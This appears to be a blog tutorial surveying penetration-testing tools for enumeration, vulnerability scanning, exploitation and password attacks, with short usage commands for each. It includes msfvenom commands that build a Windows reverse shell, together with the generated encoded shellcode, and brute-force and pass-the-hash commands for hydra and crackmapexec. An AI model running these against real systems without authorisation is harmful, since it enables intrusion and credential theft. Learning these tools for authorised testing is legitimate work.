Essential Tools for Penetration Tester


Information Gathering and Enumeration is the first stage for a penetration tester. Enumerating using some opensource tools speed up the process. Here are some tools commonly used by ethical hackers for enumeration.


Dmitry can search common information from various sources such as

Basic usage:

#whois lookup, search host on netcraft,subdomain, search for emails
dmitry -i -n -s -e



This is a tool to discover subdomain

Basic Usage:

dnsenum -u a



One of favorite information gathering tool. This tool coded by OWASP.

Basic usage:

amass intel -d -whois

#Enumeration All Subdomain
amass enum -passive -d



metagoofil extract information from various documents such as pdf,doc,ppt,xls etc.

Basic Usage:

metagoofil -d -t pdf,ppt,xls



Nmap is the most popular tool used by bad and good hackers.  Basically this tool used to scan for open ports, identify live host and os version, and even sometime could be used to discover vulnerabilities

Basic Usage:

Scan all ports

nmap -p 1-65535
nmap -p-

Scan for OS and Service Version

nmap -p 1-65535 -O --osscan-guess -sV

Scan with default nmap script

nmap -p 1-65535 -sC

Vulnerability Scanning

nmap -Pn --script vuln



Usually, i use Gobuster used to brute force website directories and files, and subdomains.

gobuster dir -u $target -t 15 -w /usr/share/dirb/wordlists/common.txt -x php,txt,conf

Discovering Vulnerability

To exploit a target a penetration tester need to find exploitable vulnerability. No tools is 100% accurate but obviously these pentesting tools help. Personally i don’t use lots of vulnerability scanning tools. Still i will list here some reliable and tested vulnerability scanner for future reference!


Nessus is the most popular commercial vulnerability scanner. Nessus can be used to scan for network and web vulnerabilities.

More information:

Burp Suite Pro

This is a semi-manual web pentesting tool. If you are a web penetration tester the only tool you need is Burp Suite Pro. Burp Suite Free version also good. With free version i find it very slow, and some additional features is not included.

 I will post another article on usage of burp suite. 

Don’t take me wrong, I don’t think you need lots of tools to scan for vulnerability as long as you have Github, Exploit-db, and Google. The information you gather can be used to find vulnerability manually.

More Information:


This is a tool to find vulnerability against wordpress cms. Usually, it does not fuzz anything but looks for versions, and compare with their own database

wpscan -e vp --plugins-detection aggressive --url $target



It is less likely to find exploits for every possible vulnerabilities unless the vulnerability is well-known. Usually the White hat hacker or red teamer don’t depend on a pre-built tool. But there are some tools that extremely helpful for the exploitation purpose.


This is the tool used by good/bad hackers for information gathering and to exploit some well-known vulnerability. I believe metasploit framework used for 4 purpose

  1. Reverse Shell Generator
  2. Shellcode Generator
  3. Information Gathering
  4. Vulnerability Exploitation

Generate a Reverse Shell payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

Generate Reverse Shell Shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST= -b "\x00" LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of py file: 2452 bytes
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x99\x73\x79\xcf\xfa\x55\x8e"
buf += b"\xce\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x65\x3b\xfa\x2b\x0a\xbd\x4e\xce\x99\x73\x38\x9e\xbb"
buf += b"\x05\xdc\x9f\xcf\x3b\x48\x1d\x9f\x1d\x05\x9c\xf9\x3b"
buf += b"\xf2\x9d\xe2\x1d\x05\x9c\xb9\x3b\xf2\xbd\xaa\x1d\x81"
buf += b"\x79\xd3\x39\x34\xfe\x33\x1d\xbf\x0e\x35\x4f\x18\xb3"
buf += b"\xf8\x79\xae\x8f\x58\xba\x74\x8e\xfb\x94\x6c\x23\xcb"
buf += b"\x32\x28\x87\x71\x07\xae\x45\xdb\x4f\x31\xce\x2a\xde"
buf += b"\x0e\x46\x99\x73\x79\x87\x7f\x95\xfa\xa9\xd1\x72\xa9"
buf += b"\x9f\x71\x1d\x96\x8a\x12\x33\x59\x86\xfb\x85\x6d\x98"
buf += b"\xd1\x8c\xb0\x8e\x71\x61\x06\x86\x98\xa5\x34\xfe\x33"
buf += b"\x1d\xbf\x0e\x35\x32\xb8\x06\xf7\x14\x8f\x0f\xa1\x93"
buf += b"\x0c\x3e\xb6\x56\xc2\xea\x91\x36\x40\x1e\x8f\x8d\xd6"
buf += b"\x8a\x12\x33\x5d\x86\xfb\x85\xe8\x8f\x12\x7f\x31\x8b"
buf += b"\x71\x15\x92\x87\x98\xa3\x38\x44\xfe\xdd\xc6\xcf\x49"
buf += b"\x32\x21\x8e\xa2\x0b\xd7\x94\xd8\x2b\x38\x96\xbb\x0f"
buf += b"\xc6\x4d\x75\x53\x38\x9d\x05\xb5\xd6\x8f\xc0\x29\x31"
buf += b"\x44\xe8\xbc\xd9\x31\x66\x8c\x24\x86\x44\x22\xfd\xfc"
buf += b"\xc6\x40\x4b\xcf\xfa\x14\xd8\x87\x10\x95\x31\x4e\x16"
buf += b"\xf5\x8f\xce\x99\x3a\xf0\x2a\xb3\xe9\x8c\xce\x88\x2f"
buf += b"\x06\xcf\xfa\x54\xcf\x9a\xd0\xfa\x9d\x83\x73\xa4\xcf"
buf += b"\x74\xd5\x04\x5f\xc8\x05\x80\xc2\x47\x73\x1b\x78\xce"
buf += b"\xfa\x55\xd7\x8f\x23\x5a\xf9\xa4\xfa\xaa\x5b\x9e\xc9"
buf += b"\x3e\x48\x06\xb7\x64\x4e\x86\x66\xb3\x31\x46\x38\x1d"
buf += b"\x71\x0e\xd1\xfa\xb8\x8e\x40\xbf\x81\x11\x79\x8c\xac"
buf += b"\x87\x73\x92\xe4\xde\xd8\x2b\x35\x46\x18\x1d\x07\x37"
buf += b"\xd8\xc9\xe0\x6a\x8e\x34\x71\x1b\xd1\xf2\xbd\x8f\xf8"
buf += b"\x55\x8e\x87\x21\x10\x14\xab\xfa\x55\x8e\xce\x99\x32"
buf += b"\x29\x8e\xaa\x1d\x07\x2c\xce\x24\x2e\x82\xcb\x95\xe4"
buf += b"\xc3\xc0\x32\x29\x2d\x06\x33\x49\x8a\xbd\x27\x78\xce"
buf += b"\xb2\xd8\xca\xea\x81\xb5\x79\xa7\xb2\xdc\x68\x98\xc9"
buf += b"\x32\x29\x8e\xaa\x14\xde\x87\x66\xb3\x38\x9f\xb3\xaa"
buf += b"\x46\x83\x10\xb2\x35\x46\x3b\x14\x34\xb7\x55\x4c\xff"
buf += b"\x30\x2f\x1d\xbf\x1c\xd1\x8c\xb3\x44\xf4\x14\x34\xc6"
buf += b"\x1e\x6e\x19\x30\x2f\xee\x7e\x7b\x3b\x25\x38\x75\x5c"
buf += b"\xc0\x33\x53\x66\xa6\x31\x4c\x3e\x7d\xb2\xc8\xe5\x79"
buf += b"\xf9\x34\x1a\x20\x8b\x75\xde\x60\x0b\xa0\x90\x55\xd7"
buf += b"\x8f\x10\xa9\x86\x1a\xfa\x55\x8e\xce"

I will publish another article on metasploit usage.


SET(Social Engineering Toolkit) is a open-source tool that help an attacker to exploit human.

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit



Sqlmap is the most complete and advanced open-source SQL injection exploitation tool out there. I don’t think i need to tell in details about sqlmap since there are already lots of information is exist in the Internet. 

Basic Usage:

python3 -hh
python3 -u


Search exploit in different sources!

  1. Search Exploit On Github
  2. Search Exploit On Exploit-db
  3. Search Exploit On Packet Storm Security

Password Attack

Penetration Tester need reliable tool for effective password attack. Successfully Password cracking depend on how good you are in making of good wordlist. Here is some tools i mostly use


Cewl is a tool to spider the target website and create custom wordlist for brute force attack.

cewl -d 3 -w dict.txt -e



Password is weak when peoples combine personal information for their password such as name and birth year(Like John1980). CUPP helps to create wordlist by combining personal information. 

Basic Usage:

cupp -i
 ___________!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus |]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: RedTm
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 01121901



Hydra is fast online password cracker. It can brute force following services:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
 Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin,
 Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,
 SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth,
 VNC and XMPP.

Basically, i use this tool for quick brute ftp, http/https(head/get/post/form), ssh, and sometime other services. If someone looking for online password cracking then hydra is good enough.

Usage example:

hydra -l admin -P dictionary.txt -t 20

But if i need to brute web login(form), usually i use Burp Suite Pro!



This is another small password brute forcer and it can brute force ssh, smb,ldap,mssql, and winrm.

Usage example:

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce


Hashcat is fast and my favorite password hash cracker. 

hashcat --help                                                                                                                               255 ⨯
hashcat (v6.2.5) starting in help mode

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

 Options Short / Long           | Type | Description                                          | Example
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db

The usage example can be found here.


Other Interesting Tools

  1. Aircrack suites for wireless pentesting:
  2. Wireshark is the sniffer:
  3. SqlNinja(Another sql injection tool):
  4. beef-xss is for exploiting XSS and browser:
  5. SecLists(Fuzzing Payloads and worldlists):

Commercial Tools

There are some good commercial tools used. Well-known are:

  1. Core Impact: This is the most popular commercial tool.
  2. Canvas: Another commercial tool written in python.
  3. Metasploit Pro: Professional Verson of metasploit.